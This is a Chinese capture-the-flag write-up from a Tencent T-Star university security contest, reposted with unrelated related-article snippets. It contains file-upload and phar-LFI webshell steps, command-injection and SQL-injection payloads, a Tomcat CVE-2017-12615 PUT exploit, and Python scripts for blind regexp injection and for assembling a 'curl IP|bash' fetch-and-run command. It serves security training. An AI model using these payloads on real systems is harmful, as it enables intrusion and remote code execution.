腾讯犀牛鸟网络安全T-Star高校挑战赛writeup

news/2024/11/15 1:43:28/

高校组 今天你吃了吗战队WRITEUP

三、 解题过程
题目一 签到
操作内容:
Js检测,禁用js即可上传
http://588f25a5.yunyansec.com/upload/2.php

蚁剑连接即可

如该题使用自己编写的脚本请详细写出,不允许截图

flag值:
key{K735c9f0D7ddc3b9}

题目二 命令执行基础
操作内容:
命令执行payload:127.0.0.1|ls …
127.0.0.1|cat …/key.php
如该题使用自己编写的脚本请详细写出,不允许截图

flag值:
flag{usderhky}

题目三 你能爆破吗
操作内容:
Admin admin 登录后,发现cookie有uname且经过base64,解密后为admin
结合描述cookie注入,对payload进行base64加密后修改cookie里的uname值 刷新页面即可。
-1" union select 1,2,flag from flag# base64后
LTEiIHVuaW9uIHNlbGVjdCAxLDIsZmxhZyBmcm9tIGZsYWcj

如该题使用自己编写的脚本请详细写出,不允许截图

flag值:
flag{a405ef895ef46d96}

题目四 文件包含getshell
操作内容:

<?php $p = new PharData(dirname(__FILE__).'/phartest2.zip', 0,'phartest2',Phar::ZIP) ; $x=file_get_contents('s.php'); $p->addFromString('2.php', $x); ?>

合成一句话木马,生成phar格式,修改后缀为txt上传,。在文件包含处,http://a3554b54.yunyansec.com/lfi.php?file=phar://./files/n6LYqzd7ZtkfUrSG.txt/2
蚁剑连接

如该题使用自己编写的脚本请详细写出,不允许截图

<?php $p = new PharData(dirname(__FILE__).'/phartest2.zip', 0,'phartest2',Phar::ZIP) ; $x=file_get_contents('s.php'); $p->addFromString('2.php', $x); ?>

flag值:
flag{weisuohenzhongyao}

题目五 成绩查询
操作内容:
Sql注入
爆表:
-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

爆字段:
-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#

爆flag字段::
-1’ union select 1,2,3,flag from fl4g#

如该题使用自己编写的脚本请详细写出,不允许截图

flag值:

flag{Sql_INJECT0N_4813drd8hz4}

题目六 小猫咪踩灯泡
操作内容:
CVE-2017-12615利用,put方法写马

访问写入的123.jsp

如该题使用自己编写的脚本请详细写出,不允许截图

flag值:

flag{54e47be053bf6ea1}

题目七 分析代码获得flag
操作内容:
通过linux命令换行等绕过字符限制,curl 服务器执行命令,将key写入1.txt
服务器index.html
Cat …/key

如该题使用自己编写的脚本请详细写出,不允许截图
import requests
from time import sleep
from urllib import quote

payload = [
# generate ls -t>g file
‘>ls\’,
‘ls>’,
‘>\ \’,
‘>-t\’,
‘>>g’,
'ls>>
’,

'>txt',
'>\>1.\\',
'>h\ \\',
'>bas\\',
'>\|\\',
'>248\\',
'>0.\\',
'>16\\',
'>97.\\',
'>7.\\',
'>4\\',
'>\ \\',
'>rl\\',
'>cu\\',# exec
'sh _',
'sh g',

]

for i in payload:

r = requests.get('http://d18945d8.yunyansec.com/?1=' + quote(i))print isleep(0.2)

flag值:
flag{a1c8BFF2}

题目八 SQL注入2
操作内容:
御剑扫:wwwroot.zip 内有function.php,为过滤函数,找到注入点
http://2af1b1a3.yunyansec.com/picture.php?id=1
没有过滤^,过滤了select和union就很难受,?action=login页面传递username和password值,猜测password为字段名。
1"^(password regexp ‘^{}’)%23
正则注入 password,获得password值

如该题使用自己编写的脚本请详细写出,不允许截图
import requests
from urllib.parse import quote
all="-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!#$%&()*+,-./:;<=>?@[]^_`{|}~"
flag = “”
for j in range(40):
for i in all:
url = “http://2af1b1a3.yunyansec.com/picture.php?id=1”^(password regexp ‘^{}’)%23".format(flag + i)
# url = “http://518fdfda.yunyansec.com/picture.php?id=1” ^(password regexp ‘^5’)%23"
r = requests.get(url)
print(url)
# print(r.text)
if “Picture” in r.text:
flag += i
print(flag)
break
flag值:
Flag{e0a345cadaba033073d88d2cc5dce2f7}


http://www.ppmy.cn/news/569239.html

相关文章

如何通过NLP人工智能大规模分析评论文本洞察消费者心声(干货)

作为市场负责人&#xff0c;你知道用户在想什么吗&#xff1f; 你的产品带给用户的使用体验是什么样的&#xff1f; 用户最关注产品的核心功能是什么&#xff1f;当前日益 激烈的竞争环境下&#xff0c;作为品牌企业&#xff0c;应该如何利用大数据和人工智能技术对消费者进…

水晶的功效大全

一般水晶类&#xff1a; 白水晶 1.白水晶又称官运石,可以升官旺运,息灾增益,活络亲情友情. 2.白水晶是所有光色的综合体代表平衡,圆满. 3.用于祈福,许愿效果最佳,也可当护身符,平安符使用. 4.更可增加人体能量,增强视力,改善风水.吸收电磁波效果最佳. 5.白水晶能增强记忆最适合…

首先请与所有现有链接到该网络共享的映射断开连接_嘉兴快速路环线时代来了!这12张主城楼盘片区地图,请收好...

昨日&#xff0c;嘉兴有大事发生。 全城期待的主城区快速路环线工程&#xff0c;正式开工&#xff01; 顷刻之间&#xff0c;新闻刷遍了嘉兴人的朋友圈。 有关快速路开工的具体内容&#xff0c;本文不再重复&#xff0c;请移步至嘉兴小新微信公众号---【嘉兴头条】快速路环线工…

华夫饼为什么不松软_华夫饼这做法真简单,不揉面不整形,5分钟就好,酥脆松软超好吃...

话说没有哪个小孩子不喜欢吃零食&#xff0c;超市里五花八门、充满诱惑力的零食被孩子们视为最爱的宝贝&#xff0c;就连大人有些时候也是禁不住零食的诱惑要买点回来解解馋。其实好多小零食并不健康&#xff0c;也缺少营养&#xff0c;这些弊端大家都知道&#xff0c;但就是戒…

知识产权成企业发展绕不过去的坎?格兰仕、新宝股份起纠纷

近日&#xff0c;在北京召开的“新形势下商业秘密司法保护研讨会”上&#xff0c;格兰仕公开指控&#xff0c;新宝股份及关联企业东菱威力、美格电子涉嫌非法获取、使用格兰仕磁控管产品商业秘密。同时要求新宝股份立即停止生产、销售侵害格兰仕商业秘密的磁控管产品。此消息一…

小网店“双11”尴尬:销售额50万只赚千元

“双十一”已经过去一周&#xff0c;但其搅动的争论和反思仍在继续。2012年11月14日&#xff0c;一场名为“新旧零售的交锋”论坛在浙江杭州召开。其间&#xff0c;在“双十一”中斩获颇丰的天猫总裁张勇高调宣称&#xff0c;“双十一”的成功反映了一种新经济模式的崛起。根据…

2021-03-28

linux添加新磁盘并挂载 目录 文章目录 linux添加新磁盘并挂载 目录 查看硬盘及分区信息 操作/dev/sdb分区 格式化/dev/sdb1 挂载分区到指定目录 验证下是否挂载成功 设置开机自动挂载 查看硬盘及分区信息 fdisk -l 1 上图即是我执行完命令后的截图&#xff0c;可以看到我的我有…

市场份额正在“迅速衰退”!华为将如何纾困?

编辑&#xff1a;Jhonny 由于难以应对美国的制裁&#xff0c;华为的全球智能手机销售量下滑&#xff0c;其竞争对手乘胜追击。祸不单行&#xff0c;华为在海外的市场份额也在下降&#xff0c;其去年在海外的移动网络设备市场输给了西方竞争对手。 华为的困境&#xff0c;似乎比…